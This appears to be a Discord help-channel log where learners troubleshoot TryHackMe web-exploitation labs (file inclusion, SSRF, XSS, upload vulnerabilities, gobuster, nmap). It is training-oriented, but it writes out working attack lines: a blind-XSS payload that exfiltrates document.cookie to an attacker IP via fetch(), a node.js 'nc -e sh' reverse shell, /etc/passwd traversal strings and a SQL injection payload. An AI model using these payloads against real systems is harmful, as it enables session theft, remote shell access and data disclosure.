for some websites yes... just because there are http status codes to handle things does not mean you gotta use them for things like incorrect passwords

ah right, ok, thanks! 🙂

as in a lot of cases displaying what for many is an obscure error message ( 403 ) to a user that typoed their password is bad

showing a small box that says login failed password incorrect is better

also glad shadow could help

🙂

when set-cookies are sent by the webserver, is it typically encoded, hashed or plain-text?

or can it be anything?

It should be encoded, yes

but it can be easily de-coded thought , right

can it not be hashed

Normally you'll find a base64

Btw awesome name, Mosby boys, like how I met ur mom 😁

haha

thanks

was wondering can you had set cookies when they are sent from webserver to user agent

Yes that's possible

And you can play around with it to see if there's a vulnerability

Maybe this can help you out https://resources.infosecinstitute.com/topic/risk-associated-cookies/

Thank you! 🙂

Another question, why does the last question on task5 for file inclusions use ?lang=thm-profile and not file=thm-profile?

That's how the application is built. It's not obvious that it's including a file, it isn't always obvious in the real world either

Data in cookies is arbitrary, decided by the web application. Doesn't have to be of any format, although there are restrictions on length and alloeed characters

So I’m in the file upload vuln room and two diff tasks now I’ve uploaded the php reverse shell, adjusting for my IP and port, and after the file successfully uploads I navigate to where it is on the site and click it…. But literally nothing happens on my nc listener…. I’ve tried changing the port several times and still same result, nothing … all the research I’m doing is telling me the firewall could be blocking it but that’s not it, and I’m using the attackbox from within THM so it should def be working smoothly as it has in the past … what am I leaving out or doing wrong?! Thanks in advance

Can you execute other php code, just to check the files get executed properly? Also, doublecheck you use the correct ip. Sometimes the exec functions are disabled. You can check this with php code / error checking.

I finally figured out what was causing the issue…. I wasn’t putting the IP in ‘ ‘ , just straight up number without the single quotes …. I love the feeling when I think it’s something so complicated only to realize it’s something so simple staring me in the face the whole time 😂

In the web Enumeration 1.3 Practical: Gobuster I am using <gobuster vhost -u http://webenum.thm -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t50 > All it is returning is Status code 400

does anyone have a suggestion on how to change that as -s doesn't seem to work?

when I used -v to see the verbose it is listing a ton of status: 200 as missed

Try it using attackbox

Thanks Graves I did find it through the attack box and finished that portion, was wondering if it was something I did that borked gobuster that kept me from getting the correct answer?

Gave +1 Rep to @silent quartz

there's nothing wrong with your command

Thanks

Gave +1 Rep to @silent quartz

I had the same issue with the gobuster vhost enumeration. Kali on windows vmware returned garbage (lots of Status: 400 [Size: 424]). Attackbox performed as expected and returned the two vhosts. The kali machine had no problem with any gobuster enumeration except for vhost. Not sure what the problem was but I'm doing more testing.

I did more testing. I tried the Kali Linux Attacking Machine (Kali Linux not THM AttackBox) on THM (https://tryhackme.com/my-machine). It had the same problem (Status: 400 [Size: 4241]) as my local Kali VM running on VMware. I am ending my testing here because I am short on time. I thought the issue might be related to how Kali handles the /etc/hosts file but every other gobuster attack worked fine. Only gobuster vhost had the problem. Wish I knew why the AttackBox was unaffected.

I would try another distro if I had more time but for now this one will have to remain a mystery unless anyone else has answers.

On postive note. I am glad to find out how to send attackbox/THM kali linux to it's own window. I prefer to use my own VM but when forced to use the attackbox, the split screen was a little cramped, especially on the laptop.

Ok, so I kept testing and based on @misty shadow 's advice tried an older version of gobuster. Version 3.01 worked for me but he confirmed that 3.1 is working for him.

https://github.com/OJ/gobuster/issues/382

Screenshot showing gobuster 3.01 successful but 3.4 failing on the same machine. Spoiler because it contains the successful gobuster command.

It turns out that the ||--append-domain flag|| is required to get ||newer versions of|| gobuster to work ||like older versions||.

Thank you

Gave +1 Rep to @dreamy prism

Hi can anyone tell me how to learn web exploitation from basics ?

fallow the path I suppose but once you get to uploadvulns room, you will see in task 2 links to two rooms, introtoshells and webenumerationv2, I really think those two are most important ones, I just finished up with What the Shell and had so much fun with it

https://tryhackme.com/room/uploadvulns see links in task 2

Thank you so much

Gave +1 Rep to @light pike

i need help with these question

on linux interacting with the filesystem

describe your question

i dont know the awnser to Which directory contains a file?

which room, which task? make it easy

the linux fundamentals room

1 2 or 3? Just link the room and the task number so people know what you are asking about

https://tryhackme.com/room/linuxfundamentalspart1

questions 3, 4, and 5 im struggling with

sorry about the inconveniences,
new to the server'

i mean questions 2, 3, and 4

question 3 4 and 5? Do you mean the questions in Task 5?

yes

i only got number 1 correct

The point is that when you need help, its best if you are very clear about what you need help with 🙂 so whoever may help you, they dont have to put a bunch of effort into finding the task you are refering to.

so for next time it's best to: link the room, state the task number, and then explain what you already tried to find the answer 🙂

task 5 questions 2 3 and 4

yeah just keep that in mind for the future, okay.

So now looking at T5 Q2 'Which directory contains a file? ', assuming you answered the question before that and youve found all the directories, what did you try to do to check which of these directories has a file?

i put in documents because it contains a file

what do you mean?

ah

no the dir is Documents, but there are ||4|| other directories inside Documents, correct?

i think so

if you do ls in the Documents folder, what do you see?

dog pictures

4 of them

this is what Im seeing

do i have 2 run da machine

oh

that makes sense

thanks so much

that was a huge helping hand

its best not to skip over the texts in the room, as they usually describe step by step instructions. If you read the texts carefully ( or read them again when you get stuck like this ), most of the time you will be able to figure out your issue 🙂

thanks so much

no worries. have fun

i need help with https://tryhackme.com/room/linuxfundamentalspart1

task 6 question 1

did you check the hint??? also a reminder to check the perms of the files in the folder by doing ls -lah think there are 2 files which start with access.log meaning one of them is correct while the other is unreadable

yes

i dont know what i need to find after i run the command

it starts with THM{ and ends with }

won't give you the whole flag so you gotta figure out the middle part yourself

thanks for helping me

io figured it out

no problem

you will probably learn a lot about linux and end up using it a decent bit with the attackbox or kali linux virtual machine for later stuff

/prompt beautiful website for shoes

@verbal narwhal wrong server?

I have a brief question of understanding in the SSRF room. Why does the payload x/../private circumvent the filter? What does the x stand for, since it is solely arbitrary..

The x stands for a directory, although might not existent.
So with that payload you would go down 1 directory, inside the x directory, then back up one directory with ../ to then access /private

Hi, I have a question about Blind SQLi - Boolean Based part. Is there any script that increment automatically and guess the password for this sql statement : admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%

You could use sqlmap

thank you

Gave +1 Rep to @misty shadow

Question
I can open a document (which I should not have access) on a website with IDOR but it has two steps after I change the id value(which I know for several users) and refresh I need to click on a button to open the document.

I wanted to do this in one step
so I captured the document on burp but it had document_id(which is random) that was idor vulnerable it had option to change id value as well but it didn't affect the result.

Can u suggest a method which I could use to do idor from first page and get the document_id for second page then download the result in one step.

I was hoping to do this in burpsuite.

why does it not error out if x is not a legitimate directory? Thanks for some additional insight on this

Gave +1 Rep to @misty shadow

Hello!
I need your assistance.
I am stuck at the Walk an application. I'm doing Task 5 (Developer Tools - Debbuger) and when I click refresh (and select flash 'remove') the website does not stop, I only see a red flag for 1 sec and that's it.

I'm unable to verify what it says

Could you please advise?

GO through the task text again buddy 🤠

You'll get the soluion

Hey can I have some box suggestion for OSWA and OSWE.

did you figure this out after? I'm stuck on the same one

what if the cookie can be used cleverly to list files???

how can i hack facebook?

:hammer: RodrigoSanchez#0623 has been banned.

Evening. I'm having difficulty with my terminal's code for the "File Inclusion" room.

I'm on the challenge section (8) and I know what I'm supposed to do for the first flag...but I'm not sure how to execute it properly. From what I learned in the Web fundamentals, you can send a POST via the terminal. So I went to the first challenge room, went to the Network inspector, refreshed, then grabbed the "GET" information from the headers that I want to flip into "POST" (e.g. host, version, user-agent, filename, file, etc.).

Then I ran into my next issue which is making it actually run everything...I used the format that I learned earlier like so:

POST /challenges/chall1.php HTTP/1.1
HOST: (my host IP here)
User-Agent: Mozilla/5.0
file=welcome.php

Unfortunately, when I tried to execute this in my terminal, it gave me: "Please enter content (application/x-www-form-urlencoded) to be POSTed:"

So then I thought maybe it was because I had to enter it all in one line. So I nanoed a new file with the four lines above. Did a quick cat check, then tried to run it with sudo...and I receive the same response.

I know what I'm supposed to do but I'm stuck at this "enter content" in my terminal. Thoughts?

Nevermind, forgot about curl. Some adjustments and options included and grabbed it.

Hello, is someone able to explain why the method used to obtain the last flag of the SSRF module is SSRF and not file inclusion? 🙂
To me it just seemed like file inclusion and can't understand why it is SSRF tbh. Thx

It is both in my opinion, but don't get hung up on it too much

hello i am at Upload Vulnerabilities room i tried to gobuster but i got ```023/02/03 18:31:18 [!] 2 errors occurred:
* WordList (-w): Must be specified (use -w - for stdin)
* Url/Domain (-u): Must be specified

i research that error and i found out that my gobuster is 2.0 but can't update to 3.0

does anyone know how to update gobuster

What are you using attackbox or your own attacking vm ??

my own vm

sudo apt-get update && sudo apt-get upgrade

try this command

i tried both and still 2.0.1

Also which command did you use due to which you got these errors ?? Would be good if you share it here

gobuster dir -u http://shell.uploadvulns.thm -w /home/alphaomega/wordlist/KaliLists/dirbuster/directory-list-2.3-medium.txt

command is okay

sudo apt-get -y install gobuster

try this command @distant needle

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
libflashrom1 libftdi1-2 libllvm13
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
gobuster
0 upgraded, 1 newly installed, 0 to remove and 17 not upgraded.
Need to get 0 B/1,609 kB of archives.
After this operation, 5,088 kB of additional disk space will be used.
Selecting previously unselected package gobuster.
(Reading database ... 215604 files and directories currently installed.)
Preparing to unpack .../gobuster_2.0.1-1build2_amd64.deb ...
Unpacking gobuster (2.0.1-1build2) ...
Setting up gobuster (2.0.1-1build2) ...
Processing triggers for man-db (2.10.2-1) ...

You used the update command right ??

yep

or just upgrade command ??

both

I think it's a bug with gobuster not upgrading wait will share the fix here

thanks alot

Gave +1 Rep to @silent quartz

@distant needle Can you try reinstalling gobuster ??

See if it installs the latest version ??

i have done like 7 or 8 times since last night

i tried go install github.com/OJ/gobuster/v3@latest too

Try the first fix https://github.com/BlackArch/blackarch/issues/2465

btw

my vm is ubuntu not kali

is sth related with that?

Try removing it and cloning or downloading from github instead of installing through repo

lemme clone the github

If you want to download and install yourself here you go https://github.com/OJ/gobuster/releases/tag/v3.4.0

another problem is my go version is 1.18 and can't update that either

It shouldn't issue the gobuster installation I think

it said that i should have atleast 1.19 go version 😦

For updating go lang you have to remove and reinstall the latest version from it's website wait will share a guide for it

@distant needle https://www.golinuxcloud.com/upgrade-go-version/

In the context of OOP don't cookies store state and not behavior?
The "OWASP Top 10 [Severity 8] Insecure Deserialization - Cookies" section says "Websites use these cookies to store user-specific behaviours like items in their shopping cart or session IDs."

But that doesn't make a lot of sense because I thought things like username & password were states

Username and password are not states

Not of the webapp.

Maybe attributes of the underlying objects, but OOP != webapps

@orchid hazel Can you expand upon that.
I'm paraphrasing but the text described it as
State = properties
Behavior = actions

I think you're significantly misunderstanding, and mixing up OOP concepts and web concepts.

Separate cookies from serialised objects, aside from cookies being somewhere to store things

HTTP state and object state are unrelated.

@orchid hazel I'm confused why it was included as a building block
But thank you for the clarification, that helps a lot.

Gave +1 Rep to @orchid hazel

Looking at it, I have no idea why it's there over than introducing objects which are a needed part of serialisation

Can you explain what do you mean as building blocks ?? Also @orchid hazel correct me if I'm wrong but cookies store sessions or they don't ?? 🤠

What I mean that as a session it will store the amount of attributes the web application requires for verification (Different web apps require different attributes but some come in as common e.g. consider credentials) and the last state of your session on the web application. Sorry if I'm saying something wrong here, please correct me

Cookies just store data.
Often session tokens. Not sessions. The server stores session information.

Ohh... Yeah I knew the server things but TIL. Thank you 🤠

Gave +1 Rep to @orchid hazel

hey

This is just a general question: I finished the cross-site scripting and was surprised about how straightforward it is when analyzing source code and escaping to run javascript. However, it's most likely not that easy with modern websites and input validation (THM having purposefully vulnerable labs).

Is XSS still relevant?

Or perhaps I should say, does XSS struggle to work considering modern web development?

I work as a penetration tester, largely on webapps. XSS is one of the most common issues we find. There's really good defences now, excellent frameworks and CSP, but they're not widely enough adopted.

Or where they are used, they're implemented poorly or have the security weakened enough to not matter

How much "escaping" do you have to do to actually make something like a PoC alert pop up? When I took a look at random websites for fun to see like logins, comments, they're nested under a lot of code.

In the lab prior to the last, it showed almost like an "escape everything" line of code at the end when working through labs 1-6

But it doesn't seem like it would be that easy

You don't reverse engineer javascript unless you're a masochist.

But XSS payloads can be insanely easy. <img src="" onerror=alert(1)> is uh... Worryingly successful.

The clientside code is basically mever what you're fighting

So you closed the image source with the closing bracket then used something called onerror to generate the PoC

No

Just entering that exact HTML

It injects an image tag, with an empty src to cause an error, and then an onerror for it

closing tags etc might be needed, but that HTML gets you a long way.

And input validation doesn't just correct that?

Hahaha, input validation?

I think of it in concept to deny in a comments section for example, special characters like <>

You're putting more effort into this than many developers

And even then, they often only filter the input clientside so you just edit the request you're sending in Burp and sail straight through

I'm not very familiar with web development in practice but I would think there would be some best practices and such to make sure that wouldn't happen

You'd hope.

The problem is, something like SQL injection is really a solved problem. We have effectively perfect ways to prevent it, with parameterized queries etc.

SQLi still comes up. People still implement things unsafely

We have excellent tooling now, SAST and DAST for code testing, linters, all sorts. But people still don't do good. Human error, or copy paste from stack overflow, or other problems.

When you say copy/paste from stack overflow, you mean like a template devs use to start building a website?

I mean when people take code from other places, to solve problems. Less starting templates.

XSS is very rare on static websites. It's full web applications where it matters, and there's lots of logic and processing behind those typically.

finding dev instances for quick wins

I wonder how well DevSecOps works

exploiting poorly put together pipelines

change the branching flow or get them to execute arbitrary jobs

Terrible code makes it to prod as well

getting control of pipelines sounds like an excellent injection vector

In the end, human error is still the greatest weakness in anything security-related.

Anyhoo, thanks for satiating my curiosity @orchid hazel .

Gave +1 Rep to @orchid hazel

Doing the OWASP Juice shop. It said for the intercept be off and that walking the application would still be recorded in HTTP history.
Does that require the to be in the target scope?

@halcyon mortar Before I added the IP address to the scope, I wasn't seeing it in the unfiltered HTTP history.
I guess I'm asking how does Burp see any traffic if the intercept is off?

So if I'm understanding you then
If FoxyProxy=on & Intercept=off -> Burp receives traffic but doesn't intercept it
If FoxyProxy=off & Intercept=off -> Burp doesn't receive traffic

Cool thanks @halcyon mortar I had turned off FoxyProxy but that makes a lot of sense now.

Gave +1 Rep to @halcyon mortar

Hey

hi

Hey

hello guys i want someone to understand $_request method in php i didn't in file inclusion room

$_REQUEST method collects data( or values) after submission of a form and you can use those values or data somewhere(if you want to for e.g. storing values in database)

so can i also request php just i saw in php , what i mean is can this function cuase RCE if not sentised for example can i request exec or system function

and what request function is different from others like get and post methods

You mean requesting a local file using $_Request method ??

no i mean what difference about $_request function and other method like get and post

GET and POST are http methods not php method

They both work differently

It's a PHP super global
It's a variable that has the data present in the request like HTTP form parameters.
https://www.php.net/manual/en/reserved.variables.request.php
https://www.php.net/manual/en/language.variables.superglobals.php

@silent quartz thanks alot for helping me out with gobuster version problem i got solution from here https://packages.ubuntu.com/lunar/amd64/gobuster/download

Gave +1 Rep to @silent quartz

Glad you got it solved yourself buddy 🤠

wassup

anyone know common IDOR URI vulnerabilitys?

im trying to write a cheat sheet as ive been unable to find IDOR vulns

i know of https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html

but no others

Search for bug bounty writeups, the are a bunch on medium, I'm sure you'll find some that used IDOR.

Does tryhackme or HTB have a box or room for how to bypass cluodflare ip adress and find the true ip adress of a website?

Seems specific, who are you hacking?

Hello. The File Inclusion room seems to have been updated and the one writeup that is available is outdated. Could someone help me with the Task 5/Lab #3 answer. I am able to read the /etc/passwd file but the answer that worked for me isn't accepted in the answer field.

What did you try as an answer ??

Variations of /lab3.php?file=languages/../../../../../etc/passwd%00"

that all give me the result I want

like /lab3.php?file=include("languages/../../../../../etc/passwd%00").".php");

or /lab3.php?file=include("languages/../../../../../etc/passwd%00"

First question right ??

Task 5, first question yes

Do you think you need these much number of "../" ??

If I remove one (as the answer implies) then the site doesn't read the /etc/passwd

Share a screenshot here of that

You need to verify for that

!docs verify

@silent quartz

You have to understand how and what to include bud. Can you read the text of this room again ??

This command you're trying to include is not right

Ok! I will study the text again. Thank you for your help. If you have any hints, they are welcome.

If you face issues again after re-reading the text ping me 🙂

Wait a min lemme check this

@rare relic The syntax you used here (5 times "../") is giving results and at not 4 times going up "../" because you included languages directory

also why are you using include word and .".php"); in the command ?? Allthough it doesn't affect the results with your command

Did you craft those requests on your own or got them through some writeup ??

I copied them from the text of the "lesson"

Task 5 text ??

yes

Or maybe you copied from the error

I just snapped this one

i copied the last line before the note

Yeah I get it. It is there for learning purposes only you don't have to use them.

NOTE*

You can craft your own one right ??

I will try it.

Yeah that's why I told you to go through the task text again so that you can understand completely

Thank you very much for your help! I will keep going at it.

If you don't understand anything you can ping me

@silent quartz I finally got it. The lesson text had a lot of extra info, that tripped me up and the question hint wasn't very helpful...

Glad you got it buddy, lemme know if you need my help

Hello!! In the Web Fundamentals under the "Upload Vulnerabilities" module i cant seem to get this to work in my vm. Heres a screenshot of what I am seeing here

if anyone could help that would be awesome

when i check /etc/hosts everything looks good in there.. at least i believe

also i have no previous writing of it ie; cloned the line more than once... so thats the webpage error im recieving and cant find any info about this. any help is super appreciated lol

can we get a screenshot of your /etc/hosts too

the only thing i can think of is option B) here perhaps? but idk how to check

also after that please try going to http://shell.uploadvulns.thm

and not the ip

oh am i not supposed to go to the ip?

😄

because you are mapping a domain name to an ip with etc/hosts so that you can go to the domain name instead

exactly in this case

http://shell.uploadvulns.thm/ <<<< this worked

well then you can just follow along with the tasks then

thanks, @sweet python !!

Gave +1 Rep to @sweet python

no problem

its always the most obvious thing right infront of my face

possibly overthinking things maybe thats que for break time

yeah take a lot of breaks

and also write notes

i do... i finally made the move to a vm today and i finally got things working on the 3rd time around hahah

yes i do take notes. ill also be revisiting things i feel like i struggled with!

thanks again!

hi guys! I'm now doing content-discovery room. Just did task 3 "Favicon" and was wondering what does hashing have to do with favicon file?

hash can tell you what cms is installed on website

So it's auto-hashed when the site is built?

when you have hash of favicon icon it can tell you what is cms. kinda yes

Can I say that depending on CMS the favicon could use different hashing function?

i think you bit mixed thing. try read task again adn do bit google

So I did some more googling and found this.
md5sum is not the same as md5 itself. md5sum uses the md5 algorithm to check a file's integrity.
Thought md5sum is an encryption command and thought why and how the favicon files are all encrypted automatically!

Thanks anyway @toxic steppe

Gave +1 Rep to @toxic steppe

hi guys I'm doing "cross-site scripting " room , on task 8 : practical example of blind XSS is there under which we have to use the nc -nlvp <ort number> i'm facing that after successful inserting the js code and creating the support ticket i'm not getting output in the terminal

generated the ticket also

I'm doing it in my VM and </textarea><script>fetch('http://<iwrote machine ip >:9001 ?cookie=' + btoa(document.cookie) );</script>

Do you have anything listening on 9001?

Yeah you do.

This room can be bugged, This task may, or may not work depending on your tun0 address.

This room and task will be better working on the Attackbox. 🙂

If you still have the room open, I can try?

Right now I ended it

Ah, no worries. 🙂

Give me 5 mins to reopen it

@restive hemlock tell i started it

whats the target ip?

from where i have to find it ?

The ip of the target machine is what I'm requesting. 🙂

What ip did you put in the payload?

i put the ip of machine only

For the payload it should be your tun0

sorry but i'm not getting you

ignore i'm still a beginner

which IP do you use to connect remote shells to?

10.10.238.103:<port number > will be there right ?

Is 10.10.238.103 the target machine?

The ip you got from starting the machine?

yess

Not that ip

Are you on the THM VPN?

yes

Then use that ip.

okay . to use it in payload ?

Yes.

So it will be that ip:9001

yup
did

waiting for responses

What Lassi said.

it's </textarea><script>fetch('http://vpnip:9001?cookie=' + btoa(document.cookie) );</script>

shall i say vpn ip ?

still i'm not getting anything in terminal 🥲

vpn is running in my kali machine only

@halcyon mortar browser console is showing errors

this is my machine ip

i moved on to terminal and give command
nc -nlvp 9001

now on the otherhand
</textarea><script>fetch('http://10.17.21.10:9001/?cookie=' + btoa(document.cookie) );</script>

i entered this in the text area as u said to use the VPN ip and clicked in create ticket

this is my machine ip

and the ip mention here is vpn one

it's a home page

then

got it buddy

@halcyon mortar thankyou so much
can you explain in one text what mistake i made ?

according to me I get to learn is

1. I have to use that vpn ip

yes now i can decode it

I was not ussing earlier . Scrubz told me to do so

yes it's my own cookie
okayy

ohh sure i will

I’m in the nmap section. I’m following the “beginner path” and did anyone during this path be like “tf is going on” the whole section. Just the commands and stuff. It’s a ton to take in

It can be overwhelming at first 🙂

Hi all, this is my first time using discord and asking something in the try hack me community, so please tell me if this is not the right place or whatever.
But I had a really confusing time in the practical part, because I thought I was following the commands correctly, but almost none of my answers were correct.
For starters, the first one. I pinged the target machine and it responded, but the answer was that it wasn't responding

root@ip-10-10-35-134:~# nmap -sn 10.10.35.134

Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-11 13:25 GMT
Nmap scan report for ip-10-10-35-134.eu-west-1.compute.internal (10.10.35.134)
Host is up.
Nmap done: 1 IP address (1 host up) scanned in 0.00 seconds

Then, I scanned the first 999 ports and this is what I got. So I said 4 ports were open/filtered, but the answer was that all 999 were. Aren't 995 ports closed? I understood that the Xmas scan couln't differentiate from an open or a filtered port, but if it says it's closed, then it's indeed closed, isn't it?

root@ip-10-10-35-134:~# nmap -sX -p 1-999 10.10.35.134

Starting Nmap 7.60 ( https://nmap.org ) at 2023-03-11 13:37 GMT
Nmap scan report for ip-10-10-35-134.eu-west-1.compute.internal (10.10.35.134)
Host is up (0.000044s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
111/tcp open|filtered rpcbind
389/tcp open|filtered ldap

Nmap done: 1 IP address (1 host up) scanned in 93.57 seconds

Finally, I tried to deploy the ftp-anon script on port 21, but it didn't work, because the port was closed for me, but the answer was that it worked.

Can anyone help me with those? I assumed I would try all of these against the attackbox machine, whose IP was 10.10.35.134, as you can see on my commands, but then almost all of my answers were wrong

henlo
I want to do the Upload Vulnerabilities room, but I can't get past the client side filtering.
I'm using the attackbox and its burp suite to edit the responses to remove the filter script from the response, but it still won't accept the php file with the shell when I upload it.

howdy folks

https://tryhackme.com/room/uploadvulns I finished the challenge (#Task11), and I have few questions about the reverse shell payload. I generated the payload from https://www.revshells.com/.

• Using javascript version does not work. Any idea why? I thought node can run vanilla js just fine?
• Using node.js version (require('child_process').exec('nc -e sh 10.10.8.229 8080')) does not work . I got message "Activated module"
• Using node.js#2 Works!!

I''m wondering what's going on here? is it common to try with multiple payload even for same platform/framework?

might depend on how you bypassed the upload filter

it could also be because the nc on the target does not have the -e option

Thanks! all of them are uploaded just fine to the server. When I said didn't work it's more on the execution from the admin page.

Oh you mean like older version of NC ? that make sense. any idea about the javascript version?

Gave +1 Rep to @sweet python

any screenshot of what you've removed and the error you're seeing?

nc -e is only supported on specific versions, not like old versions but parallel maintained versions. You typically have to compile it with the "gaping security hole" option. It's best to avoid it.

Hey everyone! I have a general question about Gobuster: When I want to enumerate extensions with -x , how do I add a wordlist with extensions that should be enumerated? It only works when I add the extensions themselves like -x .php,.cs,.http , but when I want to add a wordlist like -x /extensions.txt, it literally enumerates "/extensions.txt"...

Could someone also please tell me what I'm doing wrong here? I even checked the command online, since I get no results, and it should give me the Virtual Hosts